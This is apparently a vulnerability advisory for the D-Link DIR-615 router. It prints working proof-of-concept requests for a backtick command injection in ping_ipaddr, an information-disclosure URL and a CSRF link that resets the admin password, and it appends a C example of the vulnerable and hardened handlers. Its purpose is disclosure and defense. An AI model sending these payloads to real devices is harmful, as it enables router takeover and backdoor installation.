
D-Link DIR-615 Multiple Remote Security Vulnerabilities

Published: 2013-02-11
Updated: 2013-06-08
Affected systems:
D-Link DIR-615
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57882
 
The D-Link Wireless N 300 Router (DIR-615) is a wireless router product. The D-Link DIR-615 has multiple vulnerabilities: a remote OS command injection caused by missing input validation on the ping_ipaddr parameter, an information disclosure, and a cross-site request forgery. Exploiting them lets an attacker disclose sensitive information, perform arbitrary actions, and execute arbitrary commands in the context of the affected device.
 
<*Source: Michael Messner (michae.messner@integralis.com)

 Links: http://www.s3cur1ty.de/m1adv2013-008
        http://www.osvdb.org/90174
 *>
Test method:
--------------------------------------------------------------------------------
Warning: the following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
Device Name: DIR-615 - Hardware revision H1
Vendor: D-Link

============ Device Description: ============
Delivering great wireless performance, network security and coverage, the D-Link Wireless N 300 Router (DIR-615) is ideal for upgrading your existing wireless home network.
Source: http://www.dlink.com/us/en/support/product/dir-615-wireless-n-300-router

============ Vulnerable Firmware Releases: ============
Firmware Version : 8.04, Tue, 4, Sep, 2012
Firmware Version : 8.04, Fri, 18, Jan, 2013

============ Vulnerability Overview: ============

* OS-Command Injection:
  => Parameter: ping_ipaddr

The vulnerability is caused by missing input validation in the ping_ipaddr parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or to upload and execute a backdoor to compromise the device.
You need to be authenticated to the device, or you have to find other methods for inserting the malicious commands.

Example Exploit:
http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr=
http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr=

Request:
GET /tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr= HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: */*
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.178.199/adv_virtual_batch.htm
Connection: keep-alive

Response:
HTTP/1.0 200 OK
Pragma: no-cache
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript" src="common.js.htm"></script>
<script language="javascript">
CommJs({init:INC_COMM_PAGE,group:PAGE_GROUP_TOOLS});
var pingResult="Domain";
var pingip="ipv4_1.1.1.1Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown"; <<== output of the injected `uname -a`
var vctinfo= [
{ethport:"0", status:"0", rate:"0", dup:"0"},
{ethport:"1", status:"0", rate:"0", dup:"0"},
{ethport:"2", status:"0", rate:"0", dup:"0"},

You have wget on the device for downloading further tools.

* Information Disclosure:
Detailed device information with configuration details.

Request:
http://192.168.178.199/gconfig.htm

Response:
var ModelName = "DIR-615";
var systemName="DLINK-DIR615";
var FunctionList = {HAS_PRIORITY_WEB_ACCOUNT:1,PRIORITY_WEB_ACCOUNT_NUM:1,HAS_IPV6_AUTO_CONFIG:1,DHCPD_HAS_OPTION_66:1,SUPPORT_WPS_DISABLE_PINCODE:1,SUPPORT_IPV6_DSLITE:1,HAS_IPV6_6RD:0,NON_USED:0}

* Changing the password does not require the current password:
The password-change request to tools_admin.htm never carries the current password, so an attacker is able to set a new password without knowing the existing one. The attacker needs access to an authenticated browser.

Request:
POST /tools_admin.htm HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/tools_admin.htm
Cookie: uid=wBIfbpFoJ9
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

page=tools_admin&admin_password1=admin&admin_password2=admin&hostname=DIR-615

* CSRF for changing the password without knowing the current one:
http://192.168.178.199/tools_admin.htm?page=tools_admin&admin_password1=admin2&admin_password2=admin2&hostname=DIR-615

============ Solution ============
No known solution available.

============ Credits ============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

============ Time Line: ============
November 2012 - discovered vulnerability
11.11.2012 - contacted D-Link via the web interface http://www.dlink.com/us/en/support/contact-support
20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D-Link
21.12.2012 - D-Link responded that they will check the findings *h00ray*
11.01.2013 - requested status update
25.01.2013 - requested status update
25.01.2013 - D-Link responded that this is a security problem from the user and/or browser and they will not provide a fix
xx.02.2013 - no update from D-Link, public release

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

D-Link
------
The vendor has not yet released a patch or upgrade program. Users of this product should watch the vendor's home page for the latest version:

http://www.dlink.com/
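Since no vendor fix exists, the following added example shows what a server-side fix for the two findings would look like. It is not D-Link firmware code (the DIR-615 source is not public) and not part of the original advisory: `build_ping_cmd_vuln` models the assumed weak pattern behind the ping_ipaddr injection (parameter pasted into a shell command line), `is_safe_ping_target` and `run_ping_safe` are the hardened path (allow-list, then exec without a shell), and `change_password_safe` with `ct_equal` is a hardened tools_admin handler that refuses GET, demands a per-session anti-CSRF token and the current password. All function names, the `/bin/ping` path and the session-token parameters are assumptions.

```c
/* Added example, not D-Link firmware code. Models the two weak handlers from
 * the advisory and a hardened version of each. Names and /bin/ping are assumed. */
#include <arpa/inet.h>
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* --- Finding 1: OS command injection through ping_ipaddr --- */

/* Assumed vulnerable pattern: the parameter is pasted into a shell command
 * line and handed to system(), so `uname -a` or $(...) inside it is evaluated
 * by /bin/sh. This only builds the string; it never runs it. */
int build_ping_cmd_vuln(const char *ping_ipaddr, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "ping -c 4 %s", ping_ipaddr);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Allow-list check: a literal IPv4/IPv6 address, or a hostname made only of
 * [A-Za-z0-9.-] that does not start with '-' (ping would read it as an
 * option). Backticks, $, ;, |, whitespace and quotes are all rejected. */
int is_safe_ping_target(const char *s)
{
    unsigned char buf[sizeof(struct in6_addr)];
    size_t len = strlen(s);
    if (len == 0 || len > 253) return 0;
    if (inet_pton(AF_INET, s, buf) == 1 || inet_pton(AF_INET6, s, buf) == 1)
        return 1;
    if (s[0] == '-') return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '.' && c != '-') return 0;
    }
    return 1;
}

/* Hardened execution: validate, then exec ping with an argv array. No shell
 * ever parses the target, so even a validator bypass could only reach ping's
 * argv. Returns ping's exit status, or -1 if the target is rejected or ping
 * cannot be started. */
int run_ping_safe(const char *target)
{
    if (!is_safe_ping_target(target)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "ping", "-c", "4", (char *)target, NULL };
        execv("/bin/ping", argv);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* --- Finding 2: password change without the current password, via CSRF --- */

enum { PW_OK = 0, PW_BAD_METHOD, PW_BAD_TOKEN, PW_BAD_OLD, PW_MISMATCH, PW_EMPTY };

/* Constant-time string comparison so the token check does not leak timing. */
static int ct_equal(const char *a, const char *b)
{
    size_t la = strlen(a), lb = strlen(b);
    unsigned char diff = (la != lb);
    for (size_t i = 0; i < la && i < lb; i++)
        diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}

/* Hardened tools_admin handler. Unlike the advisory's request it refuses GET,
 * requires an anti-CSRF token bound to the uid session cookie (a cross-site
 * page cannot read or supply it), requires the current password, and checks
 * that admin_password1 and admin_password2 agree. stored_pw holds the current
 * password and is overwritten on success (a real device would hash it). */
int change_password_safe(const char *method, const char *session_token,
                         const char *form_token, const char *old_pw,
                         const char *new1, const char *new2,
                         char *stored_pw, size_t stored_len)
{
    if (strcmp(method, "POST") != 0) return PW_BAD_METHOD;
    if (!form_token || !ct_equal(session_token, form_token)) return PW_BAD_TOKEN;
    if (!old_pw || !ct_equal(stored_pw, old_pw)) return PW_BAD_OLD;
    if (!new1 || !new2 || strcmp(new1, new2) != 0) return PW_MISMATCH;
    if (new1[0] == '\0') return PW_EMPTY;
    snprintf(stored_pw, stored_len, "%s", new1);
    return PW_OK;
}

int main(void)
{
    char cmd[128], pw[32] = "secret";
    const char *payload = "1.1.1.1`uname -a`";   /* payload from the advisory */
    build_ping_cmd_vuln(payload, cmd, sizeof cmd);
    printf("vulnerable handler would run: %s\n", cmd);
    printf("hardened validator accepts payload: %d\n", is_safe_ping_target(payload));
    printf("GET password change -> %d\n",
           change_password_safe("GET", "t0k", "t0k", "secret", "admin2", "admin2", pw, sizeof pw));
    printf("POST with token + current password -> %d, stored=%s\n",
           change_password_safe("POST", "t0k", "t0k", "secret", "admin2", "admin2", pw, sizeof pw), pw);
    return 0;
}
```

The validator rejects the advisory's `1.1.1.1`uname -a`` value outright, and because `run_ping_safe` never goes through /bin/sh, a metacharacter that slipped past it would still only be a literal argv entry for ping. For the password handler, the advisory's GET URL fails the method check before anything else, and a cross-site POST fails the token check because the token is tied to the `uid` cookie the attacker's page cannot read.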